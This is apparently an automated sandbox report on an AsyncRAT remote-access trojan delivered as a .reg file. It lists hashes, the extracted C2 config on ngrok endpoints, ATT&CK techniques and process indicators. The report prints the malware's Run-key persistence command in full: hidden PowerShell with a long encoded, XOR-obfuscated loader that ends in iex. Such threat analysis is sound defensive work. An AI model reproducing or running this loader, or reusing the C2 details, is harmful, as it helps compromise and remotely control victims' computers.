asyncrat | cf6c2c3495096544c6957276ee7dfea94f4a6efbe9b94d36df73cd6bf14da39c

General

Target

YjJqp0O3NZzC.reg
Size

89KB
MD5

e0fc383452ae4ef76fbd8edaaea8208a
SHA1

4101569ca940535cea9ddc24eab79a4c6ed5d790
SHA256

cf6c2c3495096544c6957276ee7dfea94f4a6efbe9b94d36df73cd6bf14da39c
SHA512

33160b4f22a42c3461cc8b193598d8abf20a5dc93965894c17856a08127474440211e3bda12d74f7ff1139ecebd07ec67efc64f3d75a396ccd44e83e73ebf832
SSDEEP

1536:GlyQtvJw8Tq6YLgbJSoR0Qbu+l0V1iiYio5RTQlAwUWzI1YWsV2vRrYTxWy0:PolxhbM6buNfibjTUUWzB5Hth0

Score

10^/10

asyncrat default defense_evasion discovery execution persistence rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

4.tcp.eu.ngrok.io:2024

4.tcp.eu.ngrok.io:13752

Mutex

RkZ0iMw0b8YJ

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral1/files/0x000a0000000175e7-17.dat	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
1808	powershell.exe

System Binary Proxy Execution: Regsvcs/Regasm 1 TTPs 2 IoCs

Abuse Regasm to proxy execution of malicious code.

defense_evasion

Regsvcs/Regasm

T1218.009

Processes:

powershell.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\RegAsm.exe	powershell.exe
Key opened	\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\RegAsm.exe	powershell.exe

Executes dropped EXE 1 IoCs

Processes:

RegAsm.exe

pid	Process
2856	RegAsm.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

regedit.exeregedit.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBQAFQAMQByAE8AegA4ADcATwBXAGsALwBhAEQANAA2AE4ARABWAHIATwAyAHMANwBPAHoAOAAwAGEARAA0ADQAUABqAFYAcABQAHoAdAByAGEARAA4AHEATABYAEEAMgBaAEcAaAAxAEwAUwBWAGsAZQBuADgAdABJAEYAaAAvAFoAQwAxAGwAZQBYAGwAOQBmAGoAYwBpAEkAbQBoAGcAZgBYAGwAMABJADIATgBxAGYAMgBKAG0ASQAyAFIAaQBJAG4ANQA1AGUARwA4AGoAZQBYAFYANQBMAFMAQgBZAGYAbQBoAFAAYgBIADUAawBiAGwAMQBzAGYAMwA1AGsAWQAyAG8AdABJAEUAVgBvAGIARwBsAG8AZgAzADQAdABLAFcAVgBvAGIARwBsAG8AZgAzADQAawBOAGkAMABwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFQAMgB4ACsAYQBEAHMANQBMAFQAQQB0AEoAVQBwAG8AZQBTAEIARQBlAFcAaABnAFgAWAA5AGkAZgBXAGgALwBlAFgAUQB0AEkARgAxAHMAZQBXAFUAdABLAGsAVgBHAFQAbABnADMAVQBWADUAaQBhADMAbAA2AGIASAA5AG8AVQBVAE0AaQBUAEMAbwB0AEkARQBOAHMAWQBHAGcAdABLAG0AaABqAGIAbgA5ADAAZgBYAGsAcQBKAEMATgBvAFkAMgA1AC8AZABIADEANQBOAGkAMABwAFoAbQBoADAATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4ATwBZAG0ATgA3AGEASAA5ADUAVQBEAGMAMwBTADMAOQBpAFkARQA5AHMAZgBtAGcANwBPAFYANQA1AGYAMgBSAGoAYQBpAFUAcQBZAFUASQAwAFIAbQA1AGUAWQBXADgAMABlAFcAbABwAE8AawBoADUAVwBrAFYAZgBkAEQAdAArAGUAagBBAHcASwBpAFEAMgBMAFMAbABrAGUAMQBKAHMAWQAyAGwAUwBhAFcAeAA1AGIAQwAwAHcATABWAFoAZQBkAEgANQA1AGEARwBBAGoAVABtAEoAagBlADIAaAAvAGUAVgBBADMATgAwAHQALwBZAG0AQgBQAGIASAA1AG8ATwB6AGwAZQBlAFgAOQBrAFkAMgBvAGwASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBVADkAcwBmAG0AZwA3AE8AUwBRADIATABTAGwAawBlAHkAMAB3AEwAUwBsAGsAZQAxAEoAcwBZADIAbABTAGEAVwB4ADUAYgBGAFkAOQBJAHkATQA4AE8ARgBBADIATABTAGwAbwBZADIANQAvAGQASAAxADUAYQBHAGwAUwBhAFcAeAA1AGIAQwAwAHcATABTAGwAawBlADEASgBzAFkAMgBsAFMAYQBXAHgANQBiAEYAWQA4AE8AeQBNAGoASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBWAEEAMgBMAFMAbABzAGEASAA0AHQATQBDADEARABhAEgAbwBnAFEAbQA5AG4AYQBHADUANQBMAFYANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQARwBoACsAUQBHAHgAagBiAEcAcABvAGEAVABZAHQASwBXAHgAbwBmAGkATgBBAFkAbQBsAG8ATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQAbQBSADkAWgBXAGgALwBRAEcASgBwAGEARgBBADMATgAwADUAUABUAGoAWQB0AEsAVwB4AG8AZgBpAE4ARwBhAEgAUQB0AE0AQwAwAHAAWgBtAGgAMABOAGkAMABwAGIARwBoACsASQAwAFIAYgBMAFQAQQB0AEsAVwBSADcATgBpADAAcABhAFcAaAB1AGYAMwBSADkAZQBXAEoALwBMAFQAQQB0AEsAVwB4AG8AZgBpAE4ATwBmADIAaABzAGUAVwBoAEoAYQBHADUALwBkAEgAMQA1AFkAbgA4AGwASgBEAFkAdABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABkAEgAbABvAGYAaQAwAHcATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAagBXAFgAOQBzAFkAMwA1AHIAWQBuADkAZwBTADIAUgBqAGIARwBGAFAAWQBXAEoAdQBaAGkAVQBwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFUAbQBsAHMAZQBXAHcAaABMAFQAMABoAEwAUwBsAG8AWQAyADUALwBkAEgAMQA1AGEARwBsAFMAYQBXAHgANQBiAEMATgBCAGEARwBOAHEAZQBXAFUAawBOAGkAMABwAGEAVwBoAHUAWQBtAGwAbwBhAFUAOQBzAGYAbQBnADcATwBTADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBXAFcAaAAxAGUAUwBOAEkAWQAyADUAaQBhAFcAUgBqAGEAbABBADMATgAxAGgAWgBTAHoAVQBqAFMAbQBoADUAWABuAGwALwBaAEcATgBxAEoAUwBsAHAAYQBHADUAaQBhAFcAaABwAFQAMwBSADUAYQBIADQAawBOAGkAMABwAGIAMwBSADUAYQBIADQAdABNAEMAMQBXAFgAbgBSACsAZQBXAGgAZwBJADAANQBpAFkAMwB0AG8AZgAzAGwAUQBOAHoAZABMAGYAMgBKAGcAVAAyAHgAKwBhAEQAcwA1AFgAbgBsAC8AWgBHAE4AcQBKAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABtAEYAbwBhAEgAMAB0AEkARgA1AG8AYgBtAEoAagBhAFgANAB0AFAAegBZAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMAB3AEwAVgBaAGUAZABIADUANQBhAEcAQQBqAFIARQBJAGoAWABXAHgANQBaAFYAQQAzAE4AMABwAG8AZQBWAGwAbwBZAEgAMQBkAGIASABsAGwASgBTAFEAdABKAGkAMABxAFgAMgBoAHEAVABIADUAZwBJADIAaAAxAGEAQwBvADIATABWAFoAZQBkAEgANQA1AGEARwBBAGoAUgBFAEkAagBTADIAUgBoAGEARgBBADMATgAxAHAALwBaAEgAbABvAFQARwBGAGgAVAAzAFIANQBhAEgANABsAEsAWABsAG8AWQBIADEATABaAEcARgBvAFgAVwB4ADUAWgBTAEUAdABLAFcAOQAwAGUAVwBoACsASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABYADkAaQBiAG0AaAArAGYAaQAwAGcAUwAyAFIAaABhAEYAMQBzAGUAVwBVAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMABnAFcAbQBSAGoAYQBXAEoANgBYAG4AbAAwAFkAVwBnAHQAUgBXAFIAcABhAFcAaABqACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA="	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\N/A = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBQAFQAMQByAE8AegA4ADcATwBXAGsALwBhAEQANAA2AE4ARABWAHIATwAyAHMANwBPAHoAOAAwAGEARAA0ADQAUABqAFYAcABQAHoAdAByAGEARAA4AHEATABYAEEAMgBaAEcAaAAxAEwAUwBWAGsAZQBuADgAdABJAEYAaAAvAFoAQwAxAGwAZQBYAGwAOQBmAGoAYwBpAEkAbQBoAGcAZgBYAGwAMABJADIATgBxAGYAMgBKAG0ASQAyAFIAaQBJAG4ANQA1AGUARwA4AGoAZQBYAFYANQBMAFMAQgBZAGYAbQBoAFAAYgBIADUAawBiAGwAMQBzAGYAMwA1AGsAWQAyAG8AdABJAEUAVgBvAGIARwBsAG8AZgAzADQAdABLAFcAVgBvAGIARwBsAG8AZgAzADQAawBOAGkAMABwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFQAMgB4ACsAYQBEAHMANQBMAFQAQQB0AEoAVQBwAG8AZQBTAEIARQBlAFcAaABnAFgAWAA5AGkAZgBXAGgALwBlAFgAUQB0AEkARgAxAHMAZQBXAFUAdABLAGsAVgBHAFQAbABnADMAVQBWADUAaQBhADMAbAA2AGIASAA5AG8AVQBVAE0AaQBUAEMAbwB0AEkARQBOAHMAWQBHAGcAdABLAG0AaABqAGIAbgA5ADAAZgBYAGsAcQBKAEMATgBvAFkAMgA1AC8AZABIADEANQBOAGkAMABwAFoAbQBoADAATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4ATwBZAG0ATgA3AGEASAA5ADUAVQBEAGMAMwBTADMAOQBpAFkARQA5AHMAZgBtAGcANwBPAFYANQA1AGYAMgBSAGoAYQBpAFUAcQBZAFUASQAwAFIAbQA1AGUAWQBXADgAMABlAFcAbABwAE8AawBoADUAVwBrAFYAZgBkAEQAdAArAGUAagBBAHcASwBpAFEAMgBMAFMAbABrAGUAMQBKAHMAWQAyAGwAUwBhAFcAeAA1AGIAQwAwAHcATABWAFoAZQBkAEgANQA1AGEARwBBAGoAVABtAEoAagBlADIAaAAvAGUAVgBBADMATgAwAHQALwBZAG0AQgBQAGIASAA1AG8ATwB6AGwAZQBlAFgAOQBrAFkAMgBvAGwASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBVADkAcwBmAG0AZwA3AE8AUwBRADIATABTAGwAawBlAHkAMAB3AEwAUwBsAGsAZQAxAEoAcwBZADIAbABTAGEAVwB4ADUAYgBGAFkAOQBJAHkATQA4AE8ARgBBADIATABTAGwAbwBZADIANQAvAGQASAAxADUAYQBHAGwAUwBhAFcAeAA1AGIAQwAwAHcATABTAGwAawBlADEASgBzAFkAMgBsAFMAYQBXAHgANQBiAEYAWQA4AE8AeQBNAGoASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBWAEEAMgBMAFMAbABzAGEASAA0AHQATQBDADEARABhAEgAbwBnAFEAbQA5AG4AYQBHADUANQBMAFYANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQARwBoACsAUQBHAHgAagBiAEcAcABvAGEAVABZAHQASwBXAHgAbwBmAGkATgBBAFkAbQBsAG8ATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQAbQBSADkAWgBXAGgALwBRAEcASgBwAGEARgBBADMATgAwADUAUABUAGoAWQB0AEsAVwB4AG8AZgBpAE4ARwBhAEgAUQB0AE0AQwAwAHAAWgBtAGgAMABOAGkAMABwAGIARwBoACsASQAwAFIAYgBMAFQAQQB0AEsAVwBSADcATgBpADAAcABhAFcAaAB1AGYAMwBSADkAZQBXAEoALwBMAFQAQQB0AEsAVwB4AG8AZgBpAE4ATwBmADIAaABzAGUAVwBoAEoAYQBHADUALwBkAEgAMQA1AFkAbgA4AGwASgBEAFkAdABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABkAEgAbABvAGYAaQAwAHcATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAagBXAFgAOQBzAFkAMwA1AHIAWQBuADkAZwBTADIAUgBqAGIARwBGAFAAWQBXAEoAdQBaAGkAVQBwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFUAbQBsAHMAZQBXAHcAaABMAFQAMABoAEwAUwBsAG8AWQAyADUALwBkAEgAMQA1AGEARwBsAFMAYQBXAHgANQBiAEMATgBCAGEARwBOAHEAZQBXAFUAawBOAGkAMABwAGEAVwBoAHUAWQBtAGwAbwBhAFUAOQBzAGYAbQBnADcATwBTADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBXAFcAaAAxAGUAUwBOAEkAWQAyADUAaQBhAFcAUgBqAGEAbABBADMATgAxAGgAWgBTAHoAVQBqAFMAbQBoADUAWABuAGwALwBaAEcATgBxAEoAUwBsAHAAYQBHADUAaQBhAFcAaABwAFQAMwBSADUAYQBIADQAawBOAGkAMABwAGIAMwBSADUAYQBIADQAdABNAEMAMQBXAFgAbgBSACsAZQBXAGgAZwBJADAANQBpAFkAMwB0AG8AZgAzAGwAUQBOAHoAZABMAGYAMgBKAGcAVAAyAHgAKwBhAEQAcwA1AFgAbgBsAC8AWgBHAE4AcQBKAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABtAEYAbwBhAEgAMAB0AEkARgA1AG8AYgBtAEoAagBhAFgANAB0AFAAegBZAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMAB3AEwAVgBaAGUAZABIADUANQBhAEcAQQBqAFIARQBJAGoAWABXAHgANQBaAFYAQQAzAE4AMABwAG8AZQBWAGwAbwBZAEgAMQBkAGIASABsAGwASgBTAFEAdABKAGkAMABxAFgAMgBoAHEAVABIADUAZwBJADIAaAAxAGEAQwBvADIATABWAFoAZQBkAEgANQA1AGEARwBBAGoAUgBFAEkAagBTADIAUgBoAGEARgBBADMATgAxAHAALwBaAEgAbABvAFQARwBGAGgAVAAzAFIANQBhAEgANABsAEsAWABsAG8AWQBIADEATABaAEcARgBvAFgAVwB4ADUAWgBTAEUAdABLAFcAOQAwAGUAVwBoACsASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABYADkAaQBiAG0AaAArAGYAaQAwAGcAUwAyAFIAaABhAEYAMQBzAGUAVwBVAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMABnAFcAbQBSAGoAYQBXAEoANgBYAG4AbAAwAFkAVwBnAHQAUgBXAFIAcABhAFcAaABqACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA="	regedit.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

Processes:

flow	ioc
3	4.tcp.eu.ngrok.io

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

RegAsm.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Runs .reg file with regedit 1 IoCs

Processes:

regedit.exe

pid	Process
2372	regedit.exe

Runs regedit.exe 1 IoCs

Processes:

regedit.exe

pid	Process
2692	regedit.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exetaskmgr.exe

pid	Process
2572	powershell.exe
1808	powershell.exe
1808	powershell.exe
1808	powershell.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

regedit.exetaskmgr.exe

pid	Process
2692	regedit.exe
868	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exetaskmgr.exe

description	pid	Process
Token: SeDebugPrivilege	2572	powershell.exe
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeDebugPrivilege	868	taskmgr.exe

Suspicious use of FindShellTrayWindow 23 IoCs

Processes:

taskmgr.exe

pid	Process
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe

Suspicious use of SendNotifyMessage 23 IoCs

Processes:

taskmgr.exe

pid	Process
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe
868	taskmgr.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

powershell.exepowershell.exe

description	pid	Process	procid_target
PID 2572 wrote to memory of 1808	2572	powershell.exe	35
PID 2572 wrote to memory of 1808	2572	powershell.exe	35
PID 2572 wrote to memory of 1808	2572	powershell.exe	35
PID 1808 wrote to memory of 2856	1808	powershell.exe	36
PID 1808 wrote to memory of 2856	1808	powershell.exe	36
PID 1808 wrote to memory of 2856	1808	powershell.exe	36
PID 1808 wrote to memory of 2856	1808	powershell.exe	36

C:\Windows\regedit.exe
regedit.exe "C:\Users\Admin\AppData\Local\Temp\YjJqp0O3NZzC.reg"
1⤵
- Adds Run key to start application
- Runs .reg file with regedit
PID:2372

C:\Windows\regedit.exe
"C:\Windows\regedit.exe"
1⤵
- Adds Run key to start application
- Runs regedit.exe
- Suspicious behavior: GetForegroundWindowSpam
PID:2692

C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand CgAkAGUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgAD0AIAAiAEsAVwBWAG8AYgBHAGwAbwBmADMANAB0AE0AQwAxAE4AZABpADAAcQBUAEgAaAA1AFoAVwBKAC8AWgBIAGQAcwBlAFcAUgBpAFkAeQBvAHQATQBDADAAcQBQAFQAMQByAE8AegA4ADcATwBXAGsALwBhAEQANAA2AE4ARABWAHIATwAyAHMANwBPAHoAOAAwAGEARAA0ADQAUABqAFYAcABQAHoAdAByAGEARAA4AHEATABYAEEAMgBaAEcAaAAxAEwAUwBWAGsAZQBuADgAdABJAEYAaAAvAFoAQwAxAGwAZQBYAGwAOQBmAGoAYwBpAEkAbQBoAGcAZgBYAGwAMABJADIATgBxAGYAMgBKAG0ASQAyAFIAaQBJAG4ANQA1AGUARwA4AGoAZQBYAFYANQBMAFMAQgBZAGYAbQBoAFAAYgBIADUAawBiAGwAMQBzAGYAMwA1AGsAWQAyAG8AdABJAEUAVgBvAGIARwBsAG8AZgAzADQAdABLAFcAVgBvAGIARwBsAG8AZgAzADQAawBOAGkAMABwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFQAMgB4ACsAYQBEAHMANQBMAFQAQQB0AEoAVQBwAG8AZQBTAEIARQBlAFcAaABnAFgAWAA5AGkAZgBXAGgALwBlAFgAUQB0AEkARgAxAHMAZQBXAFUAdABLAGsAVgBHAFQAbABnADMAVQBWADUAaQBhADMAbAA2AGIASAA5AG8AVQBVAE0AaQBUAEMAbwB0AEkARQBOAHMAWQBHAGcAdABLAG0AaABqAGIAbgA5ADAAZgBYAGsAcQBKAEMATgBvAFkAMgA1AC8AZABIADEANQBOAGkAMABwAFoAbQBoADAATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4ATwBZAG0ATgA3AGEASAA5ADUAVQBEAGMAMwBTADMAOQBpAFkARQA5AHMAZgBtAGcANwBPAFYANQA1AGYAMgBSAGoAYQBpAFUAcQBZAFUASQAwAFIAbQA1AGUAWQBXADgAMABlAFcAbABwAE8AawBoADUAVwBrAFYAZgBkAEQAdAArAGUAagBBAHcASwBpAFEAMgBMAFMAbABrAGUAMQBKAHMAWQAyAGwAUwBhAFcAeAA1AGIAQwAwAHcATABWAFoAZQBkAEgANQA1AGEARwBBAGoAVABtAEoAagBlADIAaAAvAGUAVgBBADMATgAwAHQALwBZAG0AQgBQAGIASAA1AG8ATwB6AGwAZQBlAFgAOQBrAFkAMgBvAGwASwBXAGgAagBiAG4AOQAwAGYAWABsAG8AYQBVADkAcwBmAG0AZwA3AE8AUwBRADIATABTAGwAawBlAHkAMAB3AEwAUwBsAGsAZQAxAEoAcwBZADIAbABTAGEAVwB4ADUAYgBGAFkAOQBJAHkATQA4AE8ARgBBADIATABTAGwAbwBZADIANQAvAGQASAAxADUAYQBHAGwAUwBhAFcAeAA1AGIAQwAwAHcATABTAGwAawBlADEASgBzAFkAMgBsAFMAYQBXAHgANQBiAEYAWQA4AE8AeQBNAGoASwBXAFIANwBVAG0AeABqAGEAVgBKAHAAYgBIAGwAcwBJADAARgBvAFkAMgBwADUAWgBWAEEAMgBMAFMAbABzAGEASAA0AHQATQBDADEARABhAEgAbwBnAFEAbQA5AG4AYQBHADUANQBMAFYANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQARwBoACsAUQBHAHgAagBiAEcAcABvAGEAVABZAHQASwBXAHgAbwBmAGkATgBBAFkAbQBsAG8ATABUAEEAdABWAGwANQAwAGYAbgBsAG8AWQBDAE4AZQBhAEcANQA0AGYAMgBSADUAZABDAE4ATwBmADMAUgA5AGUAVwBKAHEAZgAyAHgAOQBaAFgAUQBqAFQAbQBSADkAWgBXAGgALwBRAEcASgBwAGEARgBBADMATgAwADUAUABUAGoAWQB0AEsAVwB4AG8AZgBpAE4ARwBhAEgAUQB0AE0AQwAwAHAAWgBtAGgAMABOAGkAMABwAGIARwBoACsASQAwAFIAYgBMAFQAQQB0AEsAVwBSADcATgBpADAAcABhAFcAaAB1AGYAMwBSADkAZQBXAEoALwBMAFQAQQB0AEsAVwB4AG8AZgBpAE4ATwBmADIAaABzAGUAVwBoAEoAYQBHADUALwBkAEgAMQA1AFkAbgA4AGwASgBEAFkAdABLAFcAbABvAGIAbQBKAHAAYQBHAGwAUABkAEgAbABvAGYAaQAwAHcATABTAGwAcABhAEcANQAvAGQASAAxADUAWQBuADgAagBXAFgAOQBzAFkAMwA1AHIAWQBuADkAZwBTADIAUgBqAGIARwBGAFAAWQBXAEoAdQBaAGkAVQBwAGEARwBOAHUAZgAzAFIAOQBlAFcAaABwAFUAbQBsAHMAZQBXAHcAaABMAFQAMABoAEwAUwBsAG8AWQAyADUALwBkAEgAMQA1AGEARwBsAFMAYQBXAHgANQBiAEMATgBCAGEARwBOAHEAZQBXAFUAawBOAGkAMABwAGEAVwBoAHUAWQBtAGwAbwBhAFUAOQBzAGYAbQBnADcATwBTADAAdwBMAFYAWgBlAGQASAA1ADUAYQBHAEEAagBXAFcAaAAxAGUAUwBOAEkAWQAyADUAaQBhAFcAUgBqAGEAbABBADMATgAxAGgAWgBTAHoAVQBqAFMAbQBoADUAWABuAGwALwBaAEcATgBxAEoAUwBsAHAAYQBHADUAaQBhAFcAaABwAFQAMwBSADUAYQBIADQAawBOAGkAMABwAGIAMwBSADUAYQBIADQAdABNAEMAMQBXAFgAbgBSACsAZQBXAGgAZwBJADAANQBpAFkAMwB0AG8AZgAzAGwAUQBOAHoAZABMAGYAMgBKAGcAVAAyAHgAKwBhAEQAcwA1